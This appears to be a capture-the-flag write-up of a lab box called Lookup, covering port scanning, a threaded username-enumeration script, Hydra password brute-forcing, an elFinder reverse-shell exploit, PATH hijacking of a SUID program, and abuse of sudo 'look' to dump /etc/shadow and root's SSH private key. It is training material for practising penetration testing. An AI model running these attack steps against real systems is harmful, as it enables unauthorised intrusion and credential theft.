Ignite
Scanning
Description of found ports.
$ nmap -sC -sV -oN nmap 10.10.14.33
Nmap scan report for 10.10.14.33
Host is up (0.032s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://lookup.thm
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I have four services: port 22 SSH< and HTTP 80 with Apache 2.4.41.
Enumeration
Setting /etc/hosts
Trying to access the web page at port 80, gave me a "The connection has timed out" error, for some reason, my browser was not able to reach the page. By searching for this error I found out that the application was redirecting to lookup.htm and it was not possible to reach out until I added the host in /etc/hosts.
To do so I executed sudo vim /etc/hosts and added 2 new entries in the file:
10.10.114.228 files.lookup.thm
10.10.114.228 files.lookup.thm
now my /etc/hosts looks like the following.
127.0.0.1 localhost
127.0.1.1 kali
10.10.114.228 lookup.thm
10.10.114.228 files.lookup.thm
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Refreshing the page Im able to access the page.
Directory bruteforcing
The first I did was a directory bruteforce with gobuster: gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://lookup.thm/ -x .php,.txt,.jsp,.xml | tee gobuster
the -x indicate file extention to check and the command tee redirects the output ot a file similarly to the > but it also prints the command output in the terminal. The pages found by Gobuster are shown below:
User enumeration
Navigating to the IP address or to lookup.thm I am presented with a login panel and I noticed that I am not in the /login.php path, hmm...
Analysing with BurpSuite
Host: lookup.thm
User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type:application/x-www-form-urlencoded
Content-Length: 29
Origin: http://lookup.thm
Connection: keep-alive
Referer: http://lookup.thm/
Upgrade-Insecure-Requests: 1
username=admin&password=admin
Now at this point, I have tried different enumerations to gain as much information as possible, manually or using automated enumeration tools such as Gobuster or Nikto. One of my big mistakes was to assume that if there was no mention of any users on the website it meant I didn't have to enumerate them. This is because, in my past challenges, there were users mentioned on the website, and usually they were the users to compromise.
I tried different combinations of usernames and passwords starting from commonly used default credentials and random usernames and passwords. I noticed that when trying the username admin I have a different error message. Normally by using random credentials the error message says Wrong username or password. Please try again. Redirecting in 3 seconds..
While using admin as a username, and a random password the error message changes to Wrong password. Please try again. Redirecting in 3 seconds..
This means I can enumerate users and check what users are registered in the system, and then given a username I can bruteforce the password, maybe? To enumerate the users I wrote the following Python scripts that test usernames from a wordlist and check the result returned by the server. Also the erro message path is at /login.php so the URL in the script is http://lookup.thm/login.php/ as this is the URL used to send the credentals. The headers are simplied copied fomr Burp's request.
#!/usr/bin/python
from concurrent.futures import ThreadPoolExecutor, as_completed
import requests
import sys
url = 'http://lookup.thm/login.php/'
def userenum(username):
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '33',
'Origin': 'http://lookup.thm',
'Connection': 'keep-alive',
'Referer': 'http://lookup.thm/',
'Upgrade-Insecure-Requests': '1'
}
myobj = {'username': username, 'password': 'testpass'}
x = requests.post(url, data=myobj, headers=headers)
if "Wrong username" not in x.text:
print(username)
exit()
f = open(sys.argv[1], 'r')
usernames = f.read().splitlines()
num_threads = 10
def test_usernames_in_batches(usernames, num_threads):
with ThreadPoolExecutor(max_workers=num_threads) as executor:
# Submit all tasks in chunks to avoid memory overload
for i in range(0, len(usernames), num_threads):
batch = usernames[i:i + num_threads]
futures = {executor.submit(userenum, username): username for username in batch}
# Process results as they complete
for future in as_completed(futures):
username = futures[future]
try:
future.result() # To raise any exceptions if they occurred
except Exception as e:
print(f"Error processing {username}: {e}")
test_usernames_in_batches(usernames, num_threads)
For this code, I took help from ChatGPT because the first version was single-threaded and it was very slow, I didn't how to create more threads. Note that ChatGPT or similar AIs are banned during OSCP and may be the same for other certifications as well. During this box, I didn't know that.
After quite a bit my script found a username, jose. Now I can proceed to brute force Jose's password with Hydra using rockyou.txt wordlist.
Bruteforcing password
The command I executed is:$ hydra -l jose -P /usr/share/wordlists/rockyou.txt -f -V lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong" -V
$ hydra -l jose -P /usr/share/wordlists/rockyou.txt -f -V lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong" -V
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-29 20:44:18
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://lookup.thm:80/login.php:username=^USER^&password=^PASS^:Wrong
[ATTEMPT] target lookup.thm - login "jose" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "jose" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "jose" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "jose" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "jose" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target lookup.thm - login "jose" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target lookup.thm - login "jose" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target lookup.thm - login "jose" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[...SNIPPED...]
[ATTEMPT] target lookup.thm - login "jose" - pass "sniper" - 1413 of 14344399 [child 14] (0/0)
[ATTEMPT] target lookup.thm - login "jose" - pass "erica" - 1414 of 14344399 [child 6] (0/0)
[80][http-post-form] host: lookup.thm login: jose password: password123
[STATUS] attack finished for lookup.thm (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-29 20:41:28
Now let's try to attemp a login with this credentials jose:passowrd123.
Shell as www-data
Once successfully logged in I am inside an application called Elffinder.
elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Creation is inspired by simplicity and convenience of Finder program used in Mac OS X operating system.
I inspected different files I was able to access and found different information such as names, but nothing interesting they seemed not useful in this situation
The second thing was to check the version of the application by clicking on the ? question mark icon.
A quick search on Google shows that the version is vulnerable. I tried many of the available exploits but ended up being able to successfully get a shell with this one from GitHub
I set my listener with NetCat as nc -lvnp 4444 and run the exploit as python3 ./exploit.py.1 -t http://files.lookup.thm/elFinder/ -lh 10.21.112.161 -lp 4444.
As a user www-data I am not able to access the user flag, I must become user think.
www-data@lookup:/var/www/files.lookup.thm/public_html/elFinder/php$ cd /home
cd /home
www-data@lookup:/home$ ls
ls
think
www-data@lookup:/home$ cd /think
cd /think
bash: cd: /think: No such file or directory
www-data@lookup:/home$ ls think
ls think
user.txt
www-data@lookup:/home$ cat ./think/user.txt
cat ./think/user.txt
cat: ./think/user.txt: Permission denied
Shell as Think
Now that I have the shell it is time to privilege escalation.The first thing I check once I have a shell is the command the current user can run as sudo, and for that, I use sudo -l. In this case, it is giving me an error which I honestly don't know what is it.
The next step is to check what users are available in the system as the www-data user al always limited in actions. Maybe other real users are less limited and are able to run more commands, and hopefully with sudo privileges. To check the available users in the system I run the following command cat /etc/passwd | grep /bin/bash
There are only 2 users in the system, root and think.
SUID program to exploit
Now I have to do lateral movement and compromise think and access as think user. Continuing my enumeration the next step is what program I can run with SUID. At this point, I do not know what will lead me in the right direction I am just following a Linux Privilege Escalation checklist found on Google used for the OSCP exam, kind of blindly.
www-data@lookup:/var/www/files.lookup.thm/public_html/elFinder/php$ find / -perm -u=s -type f 2>/dev/null
<elFinder/php$ find / -perm -u=s -type f 2>/dev/null
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/core20/1950/usr/bin/chfn
/snap/core20/1950/usr/bin/chsh
/snap/core20/1950/usr/bin/gpasswd
/snap/core20/1950/usr/bin/mount
/snap/core20/1950/usr/bin/newgrp
/snap/core20/1950/usr/bin/passwd
/snap/core20/1950/usr/bin/su
/snap/core20/1950/usr/bin/sudo
/snap/core20/1950/usr/bin/umount
/snap/core20/1950/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1950/usr/lib/openssh/ssh-keysign
/snap/core20/1974/usr/bin/chfn
/snap/core20/1974/usr/bin/chsh
/snap/core20/1974/usr/bin/gpasswd
/snap/core20/1974/usr/bin/mount
/snap/core20/1974/usr/bin/newgrp
/snap/core20/1974/usr/bin/passwd
/snap/core20/1974/usr/bin/su
/snap/core20/1974/usr/bin/sudo
/snap/core20/1974/usr/bin/umount
/snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1974/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pwm
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
What caught my eye was the program /usr/sbin/pwm, it is an uncommon program that never found in my previous challenges, but it is worth looking into by runnig it.
www-data@lookup:/var/www/files.lookup.thm/public_html/elFinder/php$ /usr/sbin/pwm
<.lookup.thm/public_html/elFinder/php$ /usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found
Very interesting! It runs the command Id that outputs something like this uid=33(www-data) gid=33(www-data) groups=33(www-data) to find the username and try to access the home directory by crafting the path with the name extracted from the command Id.
Giving a quick look at the home directory I can see that www-data has no home folder so the program /usr/sbin/pwm can't access such a folder. But the think do have a home folder. Only if I could provide the think user's Id instead of www-data...
Hijackin program execution
To go further I have to understand how Linux programs are executed from the terminal. The question to ask is: how does the terminal know where the program is when I write the name in the terminal like id, pwd, ls etc.? It uses a variable called PATH that lists a series of folder to check if they contains any program with the spcified name.
www-data@lookup:/var/www/files.lookup.thm/public_html/elFinder/php$ echo $PATH
<les.lookup.thm/public_html/elFinder/php$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
in this case the search paths are /usr/local/sbin, /usr/local/bin, /usr/sbin, /usr/bin, /sbin, /bin, and the first match will be executed as it check these folder in order. Each user has their own list of paths stored in the PATH variable. This means different users can have different paths where the system looks for programs. If a new path is added at the beginning of the list, the system will check that path first before looking at others. If it finds the program there, it won’t check the rest of the paths. This can be used to trick the system. For example, if someone adds a fake version of a command (like id) in a path that comes first, the system will run that fake command instead of the real one. The path I am going to use is /tmp as it is unresticted and I have read and write permission.
www-data@lookup:/var/www/files.lookup.thm/public_html/elFinder/php$ export PATH=/tmp:$PATH
<hm/public_html/elFinder/php$ export PATH=/tmp:$PATH
www-data@lookup:/var/www/files.lookup.thm/public_html/elFinder/php$ echo $PATH
<les.lookup.thm/public_html/elFinder/php$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Now that /tmp is at the beginning of the PATH, if a program named id exists there, it will run instead of the real one. The idea is to create a new id program that gives as output the id of the user think instead of www-data. So first of all I need to know what the output of the real id of the user think is.
www-data@lookup:/var/www/files.lookup.thm/public_html/elFinder/php$ cd /tmp
cd /tmp
www-data@lookup:/tmp$ id think
id think
uid=1000(think) gid=1000(think) groups=1000(think)
Now that we know the output of the id command of think user I can craft the simple bash program to give the exact same output.
echo -e '#!/usr/bin/bash\necho "uid=1000(think) gid=1000(think) groups=1000(think)"' > id
Now by running the program /usr/sbin/pwm I have a whole different output and it looks like a password wordlist.
www-data@lookup:/tmp$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: think
jose1006
jose1004
jose1002
jose1001teles
jose100190
jose10001
jose10.asd
jose10+
jose0_07
jose0990
jose0986$
jose098130443
jose0981
jose0924
jose0923
jose0921
thepassword
jose(1993)
jose'sbabygurl
jose&vane
jose&takie
jose&samantha
jose&pam
jose&jlo
jose&jessica
jose&jessi
josemario.AKA(think)
jose.medina.
jose.mar
jose.luis.24.oct
jose.line
jose.leonardo100
jose.leas.30
jose.ivan
jose.i22
jose.hm
jose.hater
jose.fa
jose.f
jose.dont
jose.d
jose.com}
jose.com
jose.chepe_06
jose.a91
jose.a
jose.96.
jose.9298
jose.2856171
Bruteforcing SSH password
Now the only other application that is left to compromise is the SSH. So I will try brute-forcing the think user's password with the wordlist found. But first I will save this list in a file on my local computer just by copy-pasting it from the terminal and naming the file "thinkoutput". hydra -l think -P ./thinkoutput 10.10.99.62 ssh -t 20
$ hydra -l think -P ./thinkoutput 10.10.99.62 ssh -t 20
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-30 09:14:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 20 tasks per 1 server, overall 20 tasks, 50 login tries (l:1/p:50), ~3 tries per task
[DATA] attacking ssh://10.10.99.62:22/
[22][ssh] host: 10.10.99.62 login: think password: josemario.AKA(think)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-30 09:14:58
I can now log in as user think via SSH. ssh think@10.10.99.62
$ ssh think@10.10.99.62
The authenticity of host '10.10.99.62 (10.10.99.62)' can't be established.
ED25519 key fingerprint is SHA256:Ndgax/DOZA6JS00F3afY6VbwjVhV2fg5OAMP9TqPAOs.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:6: [hashed name]
~/.ssh/known_hosts:7: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.99.62' (ED25519) to the list of known hosts.
think@10.10.99.62's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 30 Jan 2025 02:19:12 PM UTC
System load: 0.0 Processes: 131
Usage of /: 59.7% of 9.75GB Users logged in: 0
Memory usage: 23% IPv4 address for ens5: 10.10.99.62
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun May 12 12:07:25 2024 from 192.168.14.1
think@lookup:~$
As user think I am able to retrieve the user flag.
think@lookup:~$ ls
user.txt
think@lookup:~$ cat user.txt
38375fb4dd8baa2b2039ac03d92b820e
Privilege escalation
The first enumeration I always perform as mentioned earlier is to check what command the user can run as sudo, I do that by running sudo -l.
think@lookup:~$ sudo -l
[sudo] password for think:
Matching Defaults entries for think on lookup:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User think may run the following commands on lookup:
(ALL) /usr/bin/look
The user think can run the command look in /usr/bin/look with sudo privilege. At the time of doing this box, I never encountered this program. My only hope is that GTFOBins has the commands to exploit it. Luckily it has the exploit for the command look and I can read arbitrary files. Follwing the commands to execute to read arbitrary files.
LFILE=file_to_read
sudo look '' "$LFILE"
The first thing I tried to read was the file /etc/shadow and attempted to crack the password.
think@lookup:~$ LFILE=/etc/shadow
think@lookup:~$ sudo look '' "$LFILE"
root:$6$2Let6rRsGjyY5Nym$Z9P/fbmQG/EnCtlx9U5l78.bQYu8ZRwG9rgKqurGHHLpMWIXd01lUsj42ifJHHkBlwodtvi1C2Vor8Hwbu6sU1:19855:0:99999:7:::
daemon:*:19046:0:99999:7:::
bin:*:19046:0:99999:7:::
sys:*:19046:0:99999:7:::
sync:*:19046:0:99999:7:::
games:*:19046:0:99999:7:::
man:*:19046:0:99999:7:::
lp:*:19046:0:99999:7:::
mail:*:19046:0:99999:7:::
news:*:19046:0:99999:7:::
uucp:*:19046:0:99999:7:::
proxy:*:19046:0:99999:7:::
www-data:*:19046:0:99999:7:::
backup:*:19046:0:99999:7:::
list:*:19046:0:99999:7:::
irc:*:19046:0:99999:7:::
gnats:*:19046:0:99999:7:::
nobody:*:19046:0:99999:7:::
systemd-network:*:19046:0:99999:7:::
systemd-resolve:*:19046:0:99999:7:::
systemd-timesync:*:19046:0:99999:7:::
messagebus:*:19046:0:99999:7:::
syslog:*:19046:0:99999:7:::
_apt:*:19046:0:99999:7:::
tss:*:19046:0:99999:7:::
uuidd:*:19046:0:99999:7:::
tcpdump:*:19046:0:99999:7:::
landscape:*:19046:0:99999:7:::
pollinate:*:19046:0:99999:7:::
usbmux:*:19510:0:99999:7:::
sshd:*:19510:0:99999:7:::
systemd-coredump:!!:19510::::::
lxd:!:19510::::::
think:$6$Cqt14LKfnwO1hA/a$c/g4M9yiP1KGJtbiOS4zubpw2.sm4bPfCglqddPpUS615xwwsU4eg1q.nr6UDLppea8AlmJ5fQUUewLICNU371:19568:0:99999:7:::
fwupd-refresh:*:19510:0:99999:7:::
mysql:!:19568:0:99999:7:::
echo "root:$6$2Let6rRsGjyY5Nym$Z9P/fbmQG/EnCtlx9U5l78.bQYu8ZRwG9rgKqurGHHLpMWIXd01lUsj42ifJHHkBlwodtvi1C2Vor8Hwbu6sU1:19855:0:99999:7:::" > hash.$ john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
I left running JohnTheRipper (JTR) for a very long time, it was not finished yet and it did not find the password. Usually, it's an indication that this is not the right way. Why can I say this? The box submission guidelines specify that every password that is meant to be cracked must finish around 5 minutes of the tool running. This is a uideline that HTB and THM follows.
Now after spending a little time, I figured out that I can try to read the SSH id_rsa file to log as root without the need for a password. Let's try this! The path where the id_rsa is usually stored is [userhome]/.ssh/id_rsa in this case the home is /root so the full path would be /root/.ssh/id_rsa if it exists.
think@lookup:~$ LFILE=/root/.ssh/id_rsa
think@lookup:~$ sudo look '' "$LFILE"
[sudo] password for think:
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
The last this to do is to copy the key and paste on my local kali in a file name id_rsa to attempt to log in with SSH as root, ssh -i ./id_rsa root@10.10.159.232
$ ssh -i ./id_rsa root@10.10.159.232
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 30 Jan 2025 04:59:02 PM UTC
System load: 0.0 Processes: 132
Usage of /: 59.7% of 9.75GB Users logged in: 1
Memory usage: 11% IPv4 address for ens5: 10.10.159.232
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon May 13 10:00:24 2024 from 192.168.14.1
root@lookup:~# whoami
root
root@lookup:~# cat root.txt
5a285a9f257e45c68bb6c9f9f57d18e8